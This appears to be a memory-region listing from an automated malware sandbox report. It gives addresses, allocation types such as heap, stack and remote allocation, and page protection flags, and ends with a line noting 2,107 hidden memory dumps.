|
trusted library allocation
|
page read and write
|
||
1A956D26000
|
trusted library allocation
|
page read and write
|
||
1680000
|
trusted library allocation
|
page read and write
|
||
5D30000
|
trusted library allocation
|
page execute and read and write
|
||
6196000
|
heap
|
page read and write
|
||
5F0E000
|
stack
|
page read and write
|
||
1A956D18000
|
trusted library allocation
|
page read and write
|
||
DB405DF000
|
stack
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
2763F67E000
|
heap
|
page read and write
|
||
29AF000
|
trusted library allocation
|
page read and write
|
||
3381000
|
trusted library allocation
|
page read and write
|
||
2E27000
|
trusted library allocation
|
page read and write
|
||
C7339FE000
|
stack
|
page read and write
|
||
215E6F80000
|
trusted library allocation
|
page read and write
|
||
A823ED000
|
stack
|
page read and write
|
||
1604000
|
trusted library allocation
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page read and write
|
||
20531885000
|
trusted library allocation
|
page read and write
|
||
1B804930000
|
heap
|
page execute and read and write
|
||
140799000
|
remote allocation
|
page execute and read and write
|
||
1404FC000
|
remote allocation
|
page execute and read and write
|
||
56F0000
|
trusted library allocation
|
page execute and read and write
|
||
29A71E02000
|
heap
|
page read and write
|
||
1A9568A6000
|
trusted library allocation
|
page read and write
|
||
2F48000
|
trusted library allocation
|
page read and write
|
||
2052F863000
|
heap
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
7FF7C10E4000
|
trusted library allocation
|
page read and write
|
||
296B2C32000
|
heap
|
page read and write
|
||
154E3E58000
|
heap
|
page read and write
|
||
E1A8F7F000
|
stack
|
page read and write
|
||
1B804650000
|
heap
|
page read and write
|
||
29D9000
|
trusted library allocation
|
page read and write
|
||
5C46000
|
trusted library allocation
|
page read and write
|
||
2054166B000
|
trusted library allocation
|
page read and write
|
||
1A944910000
|
heap
|
page read and write
|
||
2F61000
|
trusted library allocation
|
page read and write
|
||
205418C3000
|
trusted library allocation
|
page read and write
|
||
5F66000
|
trusted library allocation
|
page read and write
|
||
60F9000
|
heap
|
page read and write
|
||
154E3E8D000
|
heap
|
page read and write
|
||
1480000
|
trusted library allocation
|
page execute and read and write
|
||
1170000
|
trusted library allocation
|
page read and write
|
||
5700000
|
trusted library allocation
|
page read and write
|
||
20541771000
|
trusted library allocation
|
page read and write
|
||
595E000
|
stack
|
page read and write
|
||
20541811000
|
trusted library allocation
|
page read and write
|
||
20531804000
|
trusted library allocation
|
page read and write
|
||
29A0060F000
|
trusted library allocation
|
page read and write
|
||
518E000
|
stack
|
page read and write
|
||
5FAF000
|
heap
|
page read and write
|
||
20541BAD000
|
trusted library allocation
|
page read and write
|
||
5F5B000
|
heap
|
page read and write
|
||
58B6000
|
trusted library allocation
|
page read and write
|
||
1A946A73000
|
trusted library allocation
|
page read and write
|
||
14EE000
|
stack
|
page read and write
|
||
1180000
|
trusted library allocation
|
page read and write
|
||
29A73A10000
|
heap
|
page execute and read and write
|
||
1A946857000
|
trusted library allocation
|
page read and write
|
||
2053162B000
|
trusted library allocation
|
page read and write
|
||
FD0000
|
trusted library allocation
|
page read and write
|
||
E1A93FE000
|
stack
|
page read and write
|
||
F20000
|
trusted library allocation
|
page read and write
|
||
2DE2000
|
trusted library allocation
|
page read and write
|
||
1A9449B7000
|
heap
|
page read and write
|
||
2EE0000
|
trusted library allocation
|
page execute and read and write
|
||
20541843000
|
trusted library allocation
|
page read and write
|
||
1A946B3A000
|
trusted library allocation
|
page read and write
|
||
20541667000
|
trusted library allocation
|
page read and write
|
||
29A71DC0000
|
heap
|
page read and write
|
||
28624FF000
|
stack
|
page read and write
|
||
3363000
|
trusted library allocation
|
page read and write
|
||
31C6000
|
trusted library allocation
|
page read and write
|
||
15B0000
|
trusted library allocation
|
page read and write
|
||
1A946400000
|
heap
|
page read and write
|
||
15AD000
|
trusted library allocation
|
page execute and read and write
|
||
2B01000
|
trusted library allocation
|
page read and write
|
||
28BEFFE000
|
stack
|
page read and write
|
||
138E000
|
stack
|
page read and write
|
||
7FF7C10E0000
|
trusted library allocation
|
page execute and read and write
|
||
30BC000
|
heap
|
page read and write
|
||
20531918000
|
trusted library allocation
|
page read and write
|
||
12D52740000
|
heap
|
page read and write
|
||
5850000
|
trusted library allocation
|
page read and write
|
||
345D000
|
trusted library allocation
|
page read and write
|
||
215E6F0E000
|
heap
|
page read and write
|
||
59DE000
|
stack
|
page read and write
|
||
4A09000
|
trusted library allocation
|
page read and write
|
||
1A956A34000
|
trusted library allocation
|
page read and write
|
||
5E0E000
|
stack
|
page read and write
|
||
20541A76000
|
trusted library allocation
|
page read and write
|
||
29A71FE5000
|
heap
|
page read and write
|
||
3315000
|
trusted library allocation
|
page read and write
|
||
744E000
|
stack
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
2D79000
|
trusted library allocation
|
page read and write
|
||
1593000
|
trusted library allocation
|
page execute and read and write
|
||
32C4000
|
trusted library allocation
|
page read and write
|
||
215E6E40000
|
heap
|
page read and write
|
||
1176000
|
trusted library allocation
|
page execute and read and write
|
||
13E0000
|
trusted library allocation
|
page read and write
|
||
162A000
|
trusted library allocation
|
page execute and read and write
|
||
1A9466ED000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F42000
|
trusted library allocation
|
page read and write
|
||
63D46F9000
|
stack
|
page read and write
|
||
32C9000
|
trusted library allocation
|
page read and write
|
||
30C4000
|
trusted library allocation
|
page read and write
|
||
18CE000
|
stack
|
page read and write
|
||
F10000
|
trusted library allocation
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page execute and read and write
|
||
33A2000
|
trusted library allocation
|
page read and write
|
||
3A83000
|
trusted library allocation
|
page read and write
|
||
20541B34000
|
trusted library allocation
|
page read and write
|
||
29A73A22000
|
heap
|
page read and write
|
||
13ED000
|
trusted library allocation
|
page execute and read and write
|
||
5CFE000
|
stack
|
page read and write
|
||
575E000
|
stack
|
page read and write
|
||
296B4504000
|
trusted library allocation
|
page read and write
|
||
296B4151000
|
trusted library allocation
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
7FF7C0FFC000
|
trusted library allocation
|
page execute and read and write
|
||
1404F2000
|
remote allocation
|
page execute and read and write
|
||
215E87CC000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F24000
|
trusted library allocation
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
A827FF000
|
stack
|
page read and write
|
||
1A956963000
|
trusted library allocation
|
page read and write
|
||
7FF7C10C5000
|
trusted library allocation
|
page read and write
|
||
30EE000
|
trusted library allocation
|
page read and write
|
||
154F5DA4000
|
trusted library allocation
|
page read and write
|
||
1A956B30000
|
trusted library allocation
|
page read and write
|
||
215E6DD0000
|
heap
|
page read and write
|
||
F86000
|
trusted library allocation
|
page read and write
|
||
5FA1000
|
heap
|
page read and write
|
||
B7D000
|
trusted library allocation
|
page execute and read and write
|
||
30D1000
|
trusted library allocation
|
page read and write
|
||
14AF000
|
stack
|
page read and write
|
||
2C5E000
|
trusted library allocation
|
page read and write
|
||
160D000
|
trusted library allocation
|
page execute and read and write
|
||
1B806360000
|
heap
|
page read and write
|
||
13F4000
|
trusted library allocation
|
page read and write
|
||
DB40872000
|
stack
|
page read and write
|
||
2F4F000
|
trusted library allocation
|
page read and write
|
||
2D8B000
|
trusted library allocation
|
page read and write
|
||
1B804762000
|
heap
|
page read and write
|
||
1B8046AC000
|
heap
|
page read and write
|
||
1A956A66000
|
trusted library allocation
|
page read and write
|
||
439A000
|
trusted library allocation
|
page read and write
|
||
75C000
|
stack
|
page read and write
|
||
5760000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
2052F9C0000
|
heap
|
page read and write
|
||
342C000
|
trusted library allocation
|
page read and write
|
||
1402000
|
trusted library allocation
|
page read and write
|
||
2F81000
|
trusted library allocation
|
page read and write
|
||
5920000
|
heap
|
page read and write
|
||
118B000
|
trusted library allocation
|
page execute and read and write
|
||
58B9000
|
trusted library allocation
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
309F000
|
trusted library allocation
|
page read and write
|
||
2C39000
|
trusted library allocation
|
page read and write
|
||
205313B0000
|
heap
|
page read and write
|
||
7FF7C1100000
|
trusted library allocation
|
page execute and read and write
|
||
296B32D6000
|
heap
|
page execute and read and write
|
||
140469000
|
remote allocation
|
page execute and read and write
|
||
3038000
|
trusted library allocation
|
page read and write
|
||
5B9E000
|
stack
|
page read and write
|
||
1A944920000
|
heap
|
page read and write
|
||
3528000
|
trusted library allocation
|
page read and write
|
||
1A9567C8000
|
trusted library allocation
|
page read and write
|
||
5C30000
|
trusted library allocation
|
page execute and read and write
|
||
1630000
|
heap
|
page read and write
|
||
5C80000
|
trusted library allocation
|
page execute and read and write
|
||
16B8000
|
heap
|
page read and write
|
||
10C4000
|
heap
|
page read and write
|
||
2F74000
|
trusted library allocation
|
page read and write
|
||
11A0000
|
trusted library allocation
|
page read and write
|
||
28627FF000
|
stack
|
page read and write
|
||
215E8233000
|
trusted library allocation
|
page read and write
|
||
F46000
|
trusted library allocation
|
page execute and read and write
|
||
1B8049A0000
|
heap
|
page read and write
|
||
604D000
|
heap
|
page read and write
|
||
5900000
|
trusted library allocation
|
page read and write
|
||
205318F8000
|
trusted library allocation
|
page read and write
|
||
7FF7C1170000
|
trusted library allocation
|
page read and write
|
||
2740F280000
|
heap
|
page read and write
|
||
31E3000
|
trusted library allocation
|
page read and write
|
||
DB409FF000
|
stack
|
page read and write
|
||
1260000
|
heap
|
page read and write
|
||
154E3D80000
|
heap
|
page read and write
|
||
B64000
|
trusted library allocation
|
page read and write
|
||
205319EB000
|
trusted library allocation
|
page read and write
|
||
1404E6000
|
remote allocation
|
page execute and read and write
|
||
2BC9000
|
trusted library allocation
|
page read and write
|
||
674F000
|
stack
|
page read and write
|
||
2B22000
|
trusted library allocation
|
page read and write
|
||
2F24000
|
trusted library allocation
|
page read and write
|
||
DB41A4D000
|
stack
|
page read and write
|
||
2763F688000
|
heap
|
page read and write
|
||
112C000
|
heap
|
page read and write
|
||
2763F8F5000
|
heap
|
page read and write
|
||
296B2C79000
|
heap
|
page read and write
|
||
154E3DD0000
|
heap
|
page read and write
|
||
1B806173000
|
heap
|
page read and write
|
||
154E606A000
|
trusted library allocation
|
page read and write
|
||
D8D6DFF000
|
stack
|
page read and write
|
||
34E0000
|
trusted library allocation
|
page read and write
|
||
3981000
|
trusted library allocation
|
page read and write
|
||
215E893E000
|
trusted library allocation
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
296B46EA000
|
trusted library allocation
|
page read and write
|
||
2BD5000
|
trusted library allocation
|
page read and write
|
||
52F0000
|
heap
|
page read and write
|
||
7310000
|
trusted library allocation
|
page read and write
|
||
5A9E000
|
stack
|
page read and write
|
||
29A71F40000
|
trusted library allocation
|
page read and write
|
||
1280000
|
heap
|
page read and write
|
||
DB40DFE000
|
stack
|
page read and write
|
||
2B8D000
|
stack
|
page read and write
|
||
1A9567D2000
|
trusted library allocation
|
page read and write
|
||
30C0000
|
trusted library allocation
|
page read and write
|
||
AF7000
|
stack
|
page read and write
|
||
2FD2000
|
trusted library allocation
|
page read and write
|
||
154E4125000
|
heap
|
page read and write
|
||
FC9000
|
trusted library allocation
|
page read and write
|
||
C7349FE000
|
stack
|
page read and write
|
||
FE0000
|
trusted library allocation
|
page execute and read and write
|
||
1A94498B000
|
heap
|
page read and write
|
||
2F77000
|
trusted library allocation
|
page read and write
|
||
1404DC000
|
remote allocation
|
page execute and read and write
|
||
1960000
|
heap
|
page execute and read and write
|
||
1410000
|
trusted library allocation
|
page read and write
|
||
2C10000
|
trusted library allocation
|
page read and write
|
||
2052F980000
|
heap
|
page read and write
|
||
5FF1000
|
heap
|
page read and write
|
||
1B8049C5000
|
heap
|
page read and write
|
||
1A94689F000
|
trusted library allocation
|
page read and write
|
||
5C60000
|
trusted library allocation
|
page execute and read and write
|
||
5D50000
|
heap
|
page read and write
|
||
B97000
|
trusted library allocation
|
page execute and read and write
|
||
F7E000
|
stack
|
page read and write
|
||
12D50BF0000
|
heap
|
page read and write
|
||
7FF7C0F6B000
|
trusted library allocation
|
page execute and read and write
|
||
369F000
|
trusted library allocation
|
page read and write
|
||
1A946877000
|
trusted library allocation
|
page read and write
|
||
215E6EC8000
|
heap
|
page read and write
|
||
2C22000
|
trusted library allocation
|
page read and write
|
||
1B816511000
|
trusted library allocation
|
page read and write
|
||
310F000
|
trusted library allocation
|
page read and write
|
||
585E000
|
stack
|
page read and write
|
||
296B33B0000
|
heap
|
page execute and read and write
|
||
DB40B7A000
|
stack
|
page read and write
|
||
2F42000
|
trusted library allocation
|
page read and write
|
||
1A956D34000
|
trusted library allocation
|
page read and write
|
||
1B8046EC000
|
heap
|
page read and write
|
||
1160000
|
trusted library allocation
|
page read and write
|
||
2B35000
|
trusted library allocation
|
page read and write
|
||
28FF000
|
stack
|
page read and write
|
||
63D483E000
|
stack
|
page read and write
|
||
2C54000
|
trusted library allocation
|
page read and write
|
||
1A956AE7000
|
trusted library allocation
|
page read and write
|
||
215E855D000
|
trusted library allocation
|
page read and write
|
||
5790000
|
heap
|
page read and write
|
||
2C71000
|
trusted library allocation
|
page read and write
|
||
1A9466FA000
|
trusted library allocation
|
page read and write
|
||
2F31000
|
trusted library allocation
|
page read and write
|
||
2B09000
|
trusted library allocation
|
page read and write
|
||
205416FB000
|
trusted library allocation
|
page read and write
|
||
154FE1B0000
|
heap
|
page read and write
|
||
215E9601000
|
trusted library allocation
|
page read and write
|
||
2BC1000
|
trusted library allocation
|
page read and write
|
||
56E5000
|
heap
|
page read and write
|
||
5702000
|
trusted library allocation
|
page read and write
|
||
C9A000
|
heap
|
page read and write
|
||
1407A6000
|
remote allocation
|
page execute and read and write
|
||
F97000
|
stack
|
page read and write
|
||
12A4000
|
heap
|
page read and write
|
||
215E889F000
|
trusted library allocation
|
page read and write
|
||
126A000
|
heap
|
page read and write
|
||
2054162D000
|
trusted library allocation
|
page read and write
|
||
1A94650E000
|
heap
|
page read and write
|
||
44FC000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F53000
|
trusted library allocation
|
page read and write
|
||
5944000
|
trusted library allocation
|
page read and write
|
||
1A956AEC000
|
trusted library allocation
|
page read and write
|
||
1610000
|
trusted library allocation
|
page read and write
|
||
296B3E35000
|
trusted library allocation
|
page read and write
|
||
215E90D1000
|
trusted library allocation
|
page read and write
|
||
2763FDB0000
|
trusted library allocation
|
page read and write
|
||
154FDA90000
|
trusted library allocation
|
page read and write
|
||
2E49000
|
trusted library allocation
|
page read and write
|
||
7FF7C1040000
|
trusted library allocation
|
page execute and read and write
|
||
4B2000
|
remote allocation
|
page execute and read and write
|
||
29E9000
|
trusted library allocation
|
page read and write
|
||
20541C07000
|
trusted library allocation
|
page read and write
|
||
610A000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
D8D71FF000
|
stack
|
page read and write
|
||
1A946947000
|
trusted library allocation
|
page read and write
|
||
20541B6B000
|
trusted library allocation
|
page read and write
|
||
3010000
|
heap
|
page execute and read and write
|
||
1B816371000
|
trusted library allocation
|
page read and write
|
||
3467000
|
trusted library allocation
|
page read and write
|
||
1A95687C000
|
trusted library allocation
|
page read and write
|
There are 2107 hidden memdumps, click here to show them.